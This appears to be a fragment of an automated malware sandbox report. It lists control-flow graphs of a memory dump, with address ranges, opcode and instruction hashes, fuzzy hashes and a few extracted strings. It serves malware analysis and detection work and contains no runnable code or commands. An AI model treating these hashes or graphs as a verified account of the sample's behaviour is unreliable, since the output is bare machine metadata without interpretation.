                                                                                                                                control_flow_graph 128 6573178-6573199 129 657319b-657319e 128->129 130 65731c4-65731c7 129->130 131 65731a0-65731bf 129->131 132 65731cd-65731ec 130->132 133 6573968-657396a 130->133 131->130 141 6573205-657320f 132->141 142 65731ee-65731f1 132->142 135 6573971-6573974 133->135 136 657396c 133->136 135->129 137 657397a-6573983 135->137 136->135 145 6573215-6573224 141->145 142->141 143 65731f3-6573203 142->143 143->145 254 6573226 call 6573990 145->254 255 6573226 call 6573998 145->255 147 657322b-6573230 148 6573232-6573238 147->148 149 657323d-657351a 147->149 148->137 170 6573520-65735cf 149->170 171 657395a-6573967 149->171 180 65735d1-65735f6 170->180 181 65735f8 170->181 183 6573601-6573614 180->183 181->183 185 6573941-657394d 183->185 186 657361a-657363c 183->186 185->170 187 6573953 185->187 186->185 189 6573642-657364c 186->189 187->171 189->185 190 6573652-657365d 189->190 190->185 191 6573663-6573739 190->191 203 6573747-6573777 191->203 204 657373b-657373d 191->204 208 6573785-6573791 203->208 209 6573779-657377b 203->209 204->203 210 6573793-6573797 208->210 211 65737f1-65737f5 208->211 209->208 210->211 214 6573799-65737c3 210->214 212 6573932-657393b 211->212 213 65737fb-6573837 211->213 212->185 212->191 225 6573845-6573853 213->225 226 6573839-657383b 213->226 221 65737c5-65737c7 214->221 222 65737d1-65737ee 214->222 221->222 222->211 228 6573855-6573860 225->228 229 657386a-6573875 225->229 226->225 228->229 232 6573862 228->232 233 6573877-657387d 229->233 234 657388d-657389e 229->234 232->229 235 6573881-6573883 233->235 236 657387f 233->236 238 65738b6-65738c2 234->238 239 65738a0-65738a6 234->239 235->234 236->234 243 65738c4-65738ca 238->243 244 65738da-657392b 238->244 240 65738aa-65738ac 239->240 241 65738a8 239->241 240->238 241->238 245 65738ce-65738d0 243->245 246 65738cc 243->246 244->212 245->244 246->244 254->147 255->147
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-3723351465
                                                                                                                                • Opcode ID: d6fa118fcbb4f876624e2c08b9417b6be7ac6ed530ac35d4a17a2522a474eb51
                                                                                                                                • Instruction ID: 7f9f3e810d943b1b9efc1d2ee67a1bcae5bb68a36d3b418eb814c61d587ae58f
                                                                                                                                • Opcode Fuzzy Hash: d6fa118fcbb4f876624e2c08b9417b6be7ac6ed530ac35d4a17a2522a474eb51
                                                                                                                                • Instruction Fuzzy Hash: BE322E31E1061A8FCB55EF74D89459DB7B2FFC9310F20C66AD449AB264EF30A985CB80

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 894 6577e78-6577e96 895 6577e98-6577e9b 894->895 896 6577eb2-6577eb5 895->896 897 6577e9d-6577eab 895->897 898 6577eb7-6577ec1 896->898 899 6577ec2-6577ec5 896->899 905 6577f1e-6577f34 897->905 906 6577ead 897->906 900 6577ec7-6577ee3 899->900 901 6577ee8-6577eeb 899->901 900->901 903 6577eed-6577f07 901->903 904 6577f0c-6577f0e 901->904 903->904 908 6577f15-6577f18 904->908 909 6577f10 904->909 912 657814f-6578159 905->912 913 6577f3a-6577f43 905->913 906->896 908->895 908->905 909->908 915 657815a-657818f 913->915 916 6577f49-6577f66 913->916 920 6578191-6578194 915->920 926 657813c-6578149 916->926 927 6577f6c-6577f94 916->927 922 657819a-65781a9 920->922 923 65783c9-65783cc 920->923 935 65781ab-65781c6 922->935 936 65781c8-657820c 922->936 924 65783ef-65783f2 923->924 925 65783ce-65783ea 923->925 928 657849d-657849f 924->928 929 65783f8-6578404 924->929 925->924 926->912 926->913 927->926 947 6577f9a-6577fa3 927->947 932 65784a6-65784a9 928->932 933 65784a1 928->933 938 657840f-6578411 929->938 932->920 937 65784af-65784b8 932->937 933->932 935->936 945 6578212-6578223 936->945 946 657839d-65783b3 936->946 942 6578413-6578419 938->942 943 6578429-657842d 938->943 948 657841d-657841f 942->948 949 657841b 942->949 950 657842f-6578439 943->950 951 657843b 943->951 960 6578229-6578246 945->960 961 6578388-6578397 945->961 946->923 947->915 954 6577fa9-6577fc5 947->954 948->943 949->943 952 6578440-6578442 950->952 951->952 956 6578444-6578447 952->956 957 6578453-657848c 952->957 963 6577fcb-6577ff5 954->963 964 657812a-6578136 954->964 956->937 957->922 977 6578492-657849c 957->977 960->961 973 657824c-6578342 call 6576698 960->973 961->945 961->946 978 6578120-6578125 963->978 979 6577ffb-6578023 963->979 964->926 964->947 1027 6578344-657834e 973->1027 1028 6578350 973->1028 978->964 979->978 986 6578029-6578057 979->986 986->978 991 657805d-6578066 986->991 991->978 992 657806c-657809e 991->992 1000 65780a0-65780a4 992->1000 1001 65780a9-65780c5 992->1001 1000->978 1003 65780a6 1000->1003 1001->964 1004 65780c7-657811e call 6576698 1001->1004 1003->1001 1004->964 1029 6578355-6578357 1027->1029 1028->1029 1029->961 1030 6578359-657835e 1029->1030 1031 6578360-657836a 1030->1031 1032 657836c 1030->1032 1033 6578371-6578373 1031->1033 1032->1033 1033->961 1034 6578375-6578381 1033->1034 1034->961
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q
                                                                                                                                • API String ID: 0-127220927
                                                                                                                                • Opcode ID: dba7b5f06191b8f6eaaab2c3a11bc59ddc9f096ed212c2b23b4e42dbb906f807
                                                                                                                                • Instruction ID: 47e091d39ec94592cba5c5362af07758b5bce2fa6e6f4962f8d82adac9788487
                                                                                                                                • Opcode Fuzzy Hash: dba7b5f06191b8f6eaaab2c3a11bc59ddc9f096ed212c2b23b4e42dbb906f807
                                                                                                                                • Instruction Fuzzy Hash: 06029F30B002059FDB54EF68E894AAEB7E6FF84314F148929D419DB395DB74EC86CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 35462812a26b1d7a3af7840c6b74158c27f28aaa05323936c1f5af4bc811bdb8
                                                                                                                                • Instruction ID: df077322d343c9aad634fdd75073b5c3a0b23a966a4e201835323e875f77b1e2
                                                                                                                                • Opcode Fuzzy Hash: 35462812a26b1d7a3af7840c6b74158c27f28aaa05323936c1f5af4bc811bdb8
                                                                                                                                • Instruction Fuzzy Hash: E1A21334A002088FDBA4DF68D584B9DB7F2FB49314F5584A9E409AB366DB35EE85CF40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 256e33bf19b1b6e85eeefccfb855e3a0ca6283ae32e7fcb68969fa1f650cb828
                                                                                                                                • Instruction ID: 8f48f965028daf3108a5ba66f15ec2a94e1cd408a8f5398103addf1d7a0570a3
                                                                                                                                • Opcode Fuzzy Hash: 256e33bf19b1b6e85eeefccfb855e3a0ca6283ae32e7fcb68969fa1f650cb828
                                                                                                                                • Instruction Fuzzy Hash: E0629D34A006058FDB54DF68E594AAEB7F2FF88314F148469E809EB395DB35ED46CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: df2730f693b6c7dd9284dbd256004397f94bf1715cf7df8ee58d498692951875
                                                                                                                                • Instruction ID: 407a960fe2f62dc971183a87e2aa1aa04d56479a0677e8bd48d38a5522710eb1
                                                                                                                                • Opcode Fuzzy Hash: df2730f693b6c7dd9284dbd256004397f94bf1715cf7df8ee58d498692951875
                                                                                                                                • Instruction Fuzzy Hash: F1328234B002099FDB54EF68E980BADB7B6FB88310F108529D905EB355DB35ED46CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 203f1ba3ab7b0c84e27bd340e9bd8cadde11c3ca809270283af8529d2f0f9cbf
                                                                                                                                • Instruction ID: 35108315feb9751235c2f2ac1200e45b1890441e145ff7246b57e70d0076559f
                                                                                                                                • Opcode Fuzzy Hash: 203f1ba3ab7b0c84e27bd340e9bd8cadde11c3ca809270283af8529d2f0f9cbf
                                                                                                                                • Instruction Fuzzy Hash: D812D235E002159FDB64DF64E88066EB7B2FF84310F248829D95A9B385EF34DD46CB91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4a102ef3738d8fd8357580cf09ad41130142b21bb7d981170149bcfa3363f0ca
                                                                                                                                • Instruction ID: 302431ee40533f8911a287d63b905c2abd5b4bf1dfb7c5bff97c045f1af08495
                                                                                                                                • Opcode Fuzzy Hash: 4a102ef3738d8fd8357580cf09ad41130142b21bb7d981170149bcfa3363f0ca
                                                                                                                                • Instruction Fuzzy Hash: 1A226D70E002099FDF64DF68E5807AEB7B6FB45310F208926E819EB395DA34DC85CB91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 657add0-657adee 1 657adf0-657adf3 0->1 2 657ae16-657ae19 1->2 3 657adf5-657ae11 1->3 4 657ae1f-657ae22 2->4 5 657afed-657aff6 2->5 3->2 7 657ae24-657ae2d 4->7 8 657ae32-657ae35 4->8 9 657ae37-657ae40 5->9 10 657affc-657b006 5->10 7->8 8->9 11 657ae4f-657ae52 8->11 12 657b007-657b011 9->12 13 657ae46-657ae4a 9->13 15 657ae54-657ae67 11->15 16 657ae6c-657ae6f 11->16 22 657b013-657b019 12->22 23 657b062-657b064 12->23 13->11 15->16 18 657ae83-657ae86 16->18 19 657ae71-657ae7e 16->19 20 657ae90-657ae93 18->20 21 657ae88-657ae8d 18->21 19->18 26 657ae95-657ae99 20->26 27 657aea4-657aea6 20->27 21->20 28 657b01b-657b03e 22->28 29 657b06a-657b06f 22->29 30 657b066-657b069 23->30 26->10 31 657ae9f 26->31 33 657aead-657aeb0 27->33 34 657aea8 27->34 32 657b040-657b043 28->32 36 657b070-657b071 29->36 37 657b08f-657b0ca 29->37 30->29 35 657b076-657b079 30->35 31->27 32->30 40 657b045-657b061 32->40 33->1 41 657aeb6-657aeda 33->41 34->33 38 657b086-657b089 35->38 39 657b07b-657b085 35->39 36->35 44 657b0d0-657b0dc 37->44 45 657b2bd-657b2d0 37->45 38->37 42 657b2f2-657b2f5 38->42 40->23 61 657aee0-657aeef 41->61 62 657afea 41->62 46 657b2f7 call 657b32a 42->46 47 657b304-657b306 42->47 59 657b0de-657b0f7 44->59 60 657b0fc-657b140 44->60 50 657b2d2 45->50 53 657b2fd-657b2ff 46->53 51 657b30d-657b310 47->51 52 657b308 47->52 58 657b2d3 50->58 51->32 57 657b316-657b320 51->57 52->51 53->47 58->58 59->50 77 657b142-657b154 60->77 78 657b15c-657b19b 60->78 65 657af07-657af42 call 6576698 61->65 66 657aef1-657aef7 61->66 62->5 83 657af44-657af4a 65->83 84 657af5a-657af71 65->84 67 657aefb-657aefd 66->67 68 657aef9 66->68 67->65 68->65 77->78 85 657b282-657b297 78->85 86 657b1a1-657b27c call 6576698 78->86 87 657af4e-657af50 83->87 88 657af4c 83->88 96 657af73-657af79 84->96 97 657af89-657af9a 84->97 85->45 86->85 87->84 88->84 99 657af7d-657af7f 96->99 100 657af7b 96->100 102 657afb2-657afe3 97->102 103 657af9c-657afa2 97->103 99->97 100->97 102->62 105 657afa6-657afa8 103->105 106 657afa4 103->106 105->102 106->102
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: XM$XM$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-1012131581
                                                                                                                                • Opcode ID: 032ee7f6036150cae7e5a54863c07e0b48232f967e84095ef2a5def938ea6e93
                                                                                                                                • Instruction ID: e0adf0429f40872c4ae5c2753c282d7b1fbbe0350ef143cd9b6e13fc9135c66c
                                                                                                                                • Opcode Fuzzy Hash: 032ee7f6036150cae7e5a54863c07e0b48232f967e84095ef2a5def938ea6e93
                                                                                                                                • Instruction Fuzzy Hash: A8E17030E002098FDB69DF69E5906AEB7B6FF85304F108929D805EB355DB34D846CB91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 256 657b760-657b782 257 657b784-657b787 256->257 258 657b7ae-657b7b1 257->258 259 657b789-657b78d 257->259 262 657b7b3-657b7b7 258->262 263 657b7c8-657b7cb 258->263 260 657bb05-657bb3e 259->260 261 657b793-657b7a3 259->261 273 657bb40-657bb43 260->273 271 657b936-657b93a 261->271 272 657b7a9 261->272 262->260 264 657b7bd-657b7c3 262->264 265 657b7d2-657b7d5 263->265 266 657b7cd-657b7cf 263->266 264->263 269 657b7d7-657b7dd 265->269 270 657b7e2-657b7e5 265->270 266->265 269->270 274 657b7e7-657b7eb 270->274 275 657b7f9-657b7fc 270->275 271->260 279 657b940-657b950 271->279 272->258 280 657bb66-657bb69 273->280 281 657bb45-657bb61 273->281 274->260 276 657b7f1-657b7f4 274->276 277 657bad5-657bad6 275->277 278 657b802-657b805 275->278 276->275 284 657badb-657bade 277->284 282 657b807-657b864 call 6576698 278->282 283 657b869-657b86c 278->283 295 657b956 279->295 296 657ba9a-657ba9e 279->296 285 657bdd5-657bdd7 280->285 286 657bb6f-657bb97 280->286 281->280 282->283 288 657b86e-657b877 283->288 289 657b87c-657b87f 283->289 292 657bae0-657bae5 284->292 293 657bae8-657baea 284->293 290 657bdde-657bde1 285->290 291 657bdd9 285->291 337 657bba1-657bbe5 286->337 338 657bb99-657bb9c 286->338 288->289 297 657b8a1-657b8a4 289->297 298 657b881-657b89c 289->298 290->273 299 657bde7-657bdf0 290->299 291->290 292->293 302 657baf1-657baf4 293->302 303 657baec 293->303 304 657b95b-657b95e 295->304 296->260 308 657baa0-657bab0 296->308 309 657b8a6-657b8a9 297->309 310 657b8ae-657b8b1 297->310 298->297 302->257 307 657bafa-657bb04 302->307 303->302 311 657b960-657b966 304->311 312 657b978-657b97b 304->312 308->277 331 657bab2 308->331 309->310 316 657b8b3-657b8bc 310->316 317 657b8c1-657b8c4 310->317 311->260 318 657b96c-657b973 311->318 319 657b992-657b995 312->319 320 657b97d-657b981 312->320 316->317 322 657b8c6-657b8db 317->322 323 657b903-657b906 317->323 318->312 319->277 327 657b99b-657b99e 319->327 320->260 324 657b987-657b98d 320->324 322->260 343 657b8e1-657b8fe 322->343 325 657b916-657b919 323->325 326 657b908-657b911 323->326 324->319 333 657b91f-657b922 325->333 334 657babc-657bac5 325->334 326->325 335 657b9b0-657b9b3 327->335 336 657b9a0 327->336 339 657bab7-657baba 331->339 344 657b924-657b92a 333->344 345 657b931-657b934 333->345 341 657bacb 334->341 342 657ba0a-657ba13 334->342 347 657b9c5-657b9c8 335->347 348 657b9b5-657b9c0 335->348 353 657b9a8-657b9ab 336->353 374 657bbeb-657bbf4 337->374 375 657bdca-657bdd4 337->375 338->299 339->334 340 657bad0-657bad3 339->340 340->277 340->284 341->340 342->260 351 657ba19-657ba20 342->351 343->323 344->311 352 657b92c 344->352 345->271 345->304 349 657b9ca-657b9ce 347->349 350 657b9d9-657b9dc 347->350 348->347 349->316 355 657b9d4 349->355 356 657b9de-657b9e7 350->356 357 657b9ec-657b9ef 350->357 359 657ba25-657ba28 351->359 352->345 353->335 355->350 356->357 357->344 363 657b9f5-657b9f8 357->363 359->277 364 657ba2e-657ba31 359->364 365 657ba05-657ba08 363->365 366 657b9fa-657ba00 363->366 367 657ba54-657ba57 364->367 368 657ba33-657ba4f 364->368 365->342 365->359 366->365 371 657ba95-657ba98 367->371 372 657ba59-657ba6e 367->372 368->367 371->296 371->339 372->260 381 657ba74-657ba90 372->381 377 657bdc0-657bdc5 374->377 378 657bbfa-657bc66 call 6576698 374->378 377->375 390 657bd60-657bd75 378->390 391 657bc6c-657bc71 378->391 381->371 390->377 392 657bc73-657bc79 391->392 393 657bc8d 391->393 395 657bc7f-657bc81 392->395 396 657bc7b-657bc7d 392->396 397 657bc8f-657bc95 393->397 398 657bc8b 395->398 396->398 399 657bc97-657bc9d 397->399 400 657bcaa-657bcb7 397->400 398->397 401 657bca3 399->401 402 657bd4b-657bd5a 399->402 407 657bccf-657bcdc 400->407 408 657bcb9-657bcbf 400->408 401->400 403 657bd12-657bd1f 401->403 404 657bcde-657bceb 401->404 402->390 402->391 413 657bd37-657bd44 403->413 414 657bd21-657bd27 403->414 416 657bd03-657bd10 404->416 417 657bced-657bcf3 404->417 407->402 410 657bcc3-657bcc5 408->410 411 657bcc1 408->411 410->407 411->407 413->402 418 657bd2b-657bd2d 414->418 419 657bd29 414->419 416->402 420 657bcf7-657bcf9 417->420 421 657bcf5 417->421 418->413 419->413 420->416 421->416
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-3723351465
                                                                                                                                • Opcode ID: fa3dff54cfc0c535accafa1681d62575d4f4c48d14c1d073297e486b53a09b7d
                                                                                                                                • Instruction ID: 50bac413433185bb0a2ca9b9f9508b9c89b1408d65e3f40155fd82938d719fe7
                                                                                                                                • Opcode Fuzzy Hash: fa3dff54cfc0c535accafa1681d62575d4f4c48d14c1d073297e486b53a09b7d
                                                                                                                                • Instruction Fuzzy Hash: 8C026D30E0020A8FDFA4DF68E580AADB7B6FF45310F10892AE419DB255DB75ED85CB91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 424 6579250-6579275 425 6579277-657927a 424->425 426 6579280-6579295 425->426 427 6579b38-6579b3b 425->427 433 6579297-657929d 426->433 434 65792ad-65792c3 426->434 428 6579b61-6579b63 427->428 429 6579b3d-6579b5c 427->429 431 6579b65 428->431 432 6579b6a-6579b6d 428->432 429->428 431->432 432->425 436 6579b73-6579b7d 432->436 437 65792a1-65792a3 433->437 438 657929f 433->438 441 65792ce-65792d0 434->441 437->434 438->434 442 65792d2-65792d8 441->442 443 65792e8-6579359 441->443 444 65792dc-65792de 442->444 445 65792da 442->445 454 6579385-65793a1 443->454 455 657935b-657937e 443->455 444->443 445->443 460 65793a3-65793c6 454->460 461 65793cd-65793e8 454->461 455->454 460->461 466 6579413-657942e 461->466 467 65793ea-657940c 461->467 472 6579453-6579461 466->472 473 6579430-657944c 466->473 467->466 474 6579463-657946c 472->474 475 6579471-65794eb 472->475 473->472 474->436 481 65794ed-657950b 475->481 482 6579538-657954d 475->482 486 6579527-6579536 481->486 487 657950d-657951c 481->487 482->427 486->481 486->482 487->486
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                                • API String ID: 0-858218434
                                                                                                                                • Opcode ID: c2f4c3baac863c21476c5175c719a3db71c8460fe5aed18d85b6841aaa0c8d59
                                                                                                                                • Instruction ID: 68f05221db973d1112fe5cc7e2ebb2f91adbdcad98327860ab14a9129dab2c58
                                                                                                                                • Opcode Fuzzy Hash: c2f4c3baac863c21476c5175c719a3db71c8460fe5aed18d85b6841aaa0c8d59
                                                                                                                                • Instruction Fuzzy Hash: 76914130B0421A8FDB54EF65D950BAEB3F6BF85204F108569C80DEB385EF709D468BA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 490 657d060-657d07b 491 657d07d-657d080 490->491 492 657d082-657d0c4 491->492 493 657d0c9-657d0cc 491->493 492->493 494 657d115-657d118 493->494 495 657d0ce-657d110 493->495 496 657d13b-657d13e 494->496 497 657d11a-657d136 494->497 495->494 499 657d140-657d142 496->499 500 657d14d-657d150 496->500 497->496 504 657d549 499->504 505 657d148 499->505 506 657d152-657d161 500->506 507 657d199-657d19c 500->507 511 657d54c-657d558 504->511 505->500 512 657d163-657d168 506->512 513 657d170-657d17c 506->513 508 657d19e-657d1a0 507->508 509 657d1ab-657d1ae 507->509 517 657d407-657d410 508->517 518 657d1a6 508->518 519 657d1f7-657d1fa 509->519 520 657d1b0-657d1f2 509->520 522 657d55e-657d84b 511->522 523 657d1fc-657d20b 511->523 512->513 514 657d182-657d194 513->514 515 657da7d-657dab6 513->515 514->507 541 657dab8-657dabb 515->541 524 657d412-657d417 517->524 525 657d41f-657d42b 517->525 518->509 519->523 526 657d243-657d246 519->526 520->519 702 657da72-657da7c 522->702 703 657d851-657d857 522->703 527 657d20d-657d212 523->527 528 657d21a-657d226 523->528 524->525 534 657d431-657d445 525->534 535 657d53c-657d541 525->535 538 657d28f-657d292 526->538 539 657d248-657d28a 526->539 527->528 528->515 536 657d22c-657d23e 528->536 534->504 560 657d44b-657d45d 534->560 535->504 536->526 542 657d294-657d2d6 538->542 543 657d2db-657d2de 538->543 539->538 546 657dade-657dae1 541->546 547 657dabd-657dad9 541->547 542->543 548 657d2e0-657d2e5 543->548 549 657d2e8-657d2eb 543->549 558 657dae3 call 657dbd5 546->558 559 657daf0-657daf3 546->559 547->546 548->549 556 657d334-657d337 549->556 557 657d2ed-657d32f 549->557 556->511 563 657d33d-657d340 556->563 557->556 574 657dae9-657daeb 558->574 566 657db26-657db28 559->566 567 657daf5-657db21 559->567 584 657d481-657d483 560->584 585 657d45f-657d465 560->585 572 657d342-657d384 563->572 573 657d389-657d38c 563->573 569 657db2f-657db32 566->569 570 657db2a 566->570 567->566 569->541 580 657db34-657db43 569->580 570->569 572->573 577 657d3d5-657d3d8 573->577 578 657d38e-657d3d0 573->578 574->559 587 657d3f5-657d3f7 577->587 588 657d3da-657d3f0 577->588 578->577 603 657db45-657dba8 call 6576698 580->603 604 657dbaa-657dbbf 580->604 590 657d48d-657d499 584->590 591 657d467 585->591 592 657d469-657d475 585->592 599 657d3fe-657d401 587->599 600 657d3f9 587->600 588->587 612 657d4a7 590->612 613 657d49b-657d4a5 590->613 594 657d477-657d47f 591->594 592->594 594->590 599->491 599->517 600->599 603->604 619 657d4ac-657d4ae 612->619 613->619 619->504 625 657d4b4-657d4d0 call 6576698 619->625 640 657d4d2-657d4d7 625->640 641 657d4df-657d4eb 625->641 640->641 641->535 642 657d4ed-657d53a 641->642 642->504 704 657d866-657d86f 703->704 705 657d859-657d85e 703->705 704->515 706 657d875-657d888 704->706 705->704 708 657da62-657da6c 706->708 709 657d88e-657d894 706->709 708->702 708->703 710 657d896-657d89b 709->710 711 657d8a3-657d8ac 709->711 710->711 711->515 712 657d8b2-657d8d3 711->712 715 657d8d5-657d8da 712->715 716 657d8e2-657d8eb 712->716 715->716 716->515 717 657d8f1-657d90e 716->717 717->708 720 657d914-657d91a 717->720 720->515 721 657d920-657d939 720->721 723 657da55-657da5c 721->723 724 657d93f-657d966 721->724 723->708 723->720 724->515 727 657d96c-657d976 724->727 727->515 728 657d97c-657d993 727->728 730 657d995-657d9a0 728->730 731 657d9a2-657d9bd 728->731 730->731 731->723 736 657d9c3-657d9dc call 6576698 731->736 740 657d9de-657d9e3 736->740 741 657d9eb-657d9f4 736->741 740->741 741->515 742 657d9fa-657da4e 741->742 742->723
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $]q$$]q$$]q
                                                                                                                                • API String ID: 0-182748909
                                                                                                                                • Opcode ID: 0fcff9239bbbac8cc0d3a2e56e4c1d8e2f7114eb19b8920828e7553fd420fcc8
                                                                                                                                • Instruction ID: 4cbb39bc363d2ac13e31923031c4e743dcc594e0375190264d4305064261b5d6
                                                                                                                                • Opcode Fuzzy Hash: 0fcff9239bbbac8cc0d3a2e56e4c1d8e2f7114eb19b8920828e7553fd420fcc8
                                                                                                                                • Instruction Fuzzy Hash: 14625130A0021A8FCB55EF68E580A5DB7F6FF85344B10CA68D4099F369DB75ED4ACB81

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 847 6574c88-6574cac 848 6574cae-6574cb1 847->848 849 6574cb3-6574ccd 848->849 850 6574cd2-6574cd5 848->850 849->850 851 65753b4-65753b6 850->851 852 6574cdb-6574dd3 850->852 853 65753bd-65753c0 851->853 854 65753b8 851->854 870 6574e56-6574e5d 852->870 871 6574dd9-6574e26 call 6575531 852->871 853->848 857 65753c6-65753d3 853->857 854->853 872 6574e63-6574ed3 870->872 873 6574ee1-6574eea 870->873 884 6574e2c-6574e48 871->884 890 6574ed5 872->890 891 6574ede 872->891 873->857 887 6574e53-6574e54 884->887 888 6574e4a 884->888 887->870 888->887 890->891 891->873
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2359450097.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_6570000_neworigin.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: fbq$XPbq$\Obq
                                                                                                                                • API String ID: 0-4057264190
                                                                                                                                • Opcode ID: 75ec4977ec11370d9cd61cae0ea358e58da29c8c8054708dd93bb6a013738f0d
                                                                                                                                • Instruction ID: e33463ce61a928c1fe3d8d41de9048a016cfa50530a64de4f6a55728889ce7f9
                                                                                                                                • Opcode Fuzzy Hash: 75ec4977ec11370d9cd61cae0ea358e58da29c8c8054708dd93bb6a013738f0d
                                                                                                                                • Instruction Fuzzy Hash: 41618130F002199FEB55DFA4D8547AEBAF6FB88310F208429E50AAB395DB754C458F91

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
